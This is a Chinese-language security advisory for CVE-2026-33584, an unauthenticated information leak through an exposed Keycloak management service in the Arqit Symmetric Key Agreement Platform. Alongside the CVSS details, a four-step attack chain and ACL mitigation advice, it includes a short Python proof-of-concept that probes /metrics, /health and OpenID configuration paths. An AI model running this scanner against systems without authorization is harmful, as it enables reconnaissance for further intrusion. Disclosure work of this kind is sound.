CVE-2026-33584 CVSS 5.3 中危

CVE-2026-33584 Arqit平台Keycloak信息泄露漏洞

披露日期: 2026-05-13

来源: a6d3dc9e-0591-4a13-bce7-0f5b31ff6158

漏洞信息

漏洞编号

CVE-2026-33584

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Arqit Symmetric Key Agreement Platform

漏洞概述

Arqit Symmetric Key Agreement Platform在26.03之前的版本中存在信息泄露漏洞。由于Keycloak管理服务配置不当并暴露在外，攻击者无需身份验证即可通过网络访问该服务。成功利用此漏洞可获取敏感的调试信息、系统指标及健康数据，对系统机密性构成威胁。

技术细节

该漏洞技术原理在于Arqit Symmetric Key Agreement Platform错误地将Keycloak管理服务接口暴露给公网或未授权网络区域。Keycloak作为身份认证提供商，其管理接口通常用于运维监控，包含系统指标、健康检查数据及敏感调试信息。根据CVSS向量分析，该漏洞攻击复杂度低（AC:L），无需任何权限（PR:N）且无需用户交互（UI:N）。攻击者可通过网络直接扫描并访问暴露的管理端口或特定路径。一旦访问成功，攻击者能够解析服务器响应，提取出敏感的系统运行状态信息。这些信息虽未直接破坏系统完整性，但泄露的内部架构细节将极大降低后续攻击的难度。

攻击链分析

STEP 1

1. 信息收集

攻击者使用扫描工具发现互联网上暴露的Arqit Symmetric Key Agreement Platform服务。

STEP 2

2. 端点探测

攻击者针对目标服务器发送HTTP请求，探测Keycloak管理相关的未授权访问端点（如/metrics或/admin）。

STEP 3

3. 利用漏洞

由于服务无需认证（PR:N），攻击者直接获取HTTP 200 OK响应，下载敏感的调试信息、指标和健康数据。

STEP 4

4. 数据窃取

攻击者分析获取到的数据，提取系统内部架构、版本信息及运行状态，为后续攻击做准备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_exploit(target_url):
    """
    POC to check for exposed Keycloak management endpoints.
    """
    # Common paths for Keycloak metrics or admin console
    paths = ["/auth/realms/master/.well-known/openid-configuration", "/metrics", "/health"]
    
    headers = {
        "User-Agent": "CVE-2026-33584-Scanner/1.0"
    }

    for path in paths:
        url = f"{target_url.rstrip('/')}{path}"
        try:
            response = requests.get(url, headers=headers, timeout=5)
            if response.status_code == 200:
                print(f"[+] Potential sensitive data exposed at: {url}")
                print(f"[+] Content-Type: {response.headers.get('Content-Type')}")
            else:
                print(f"[-] {url} returned status code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {url}: {e}")

if __name__ == "__main__":
    target = "http://example-arqit-platform.com"
    check_exploit(target)

影响范围

Arqit Symmetric Key Agreement Platform < 26.03

防御指南

临时缓解措施

如果无法立即升级补丁，建议通过网络访问控制列表（ACL）严格限制Keycloak管理服务的来源IP，仅允许受信任的内部运维主机访问，阻断公网访问路径。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-33584
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-33584
3 Details https://www.cvedetails.com/cve/CVE-2026-33584/
4 VulDB https://vuldb.com/cve/CVE-2026-33584
5 Link https://www.cvcn.gov.it/cvcn/cve/CVE-2026-33584

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表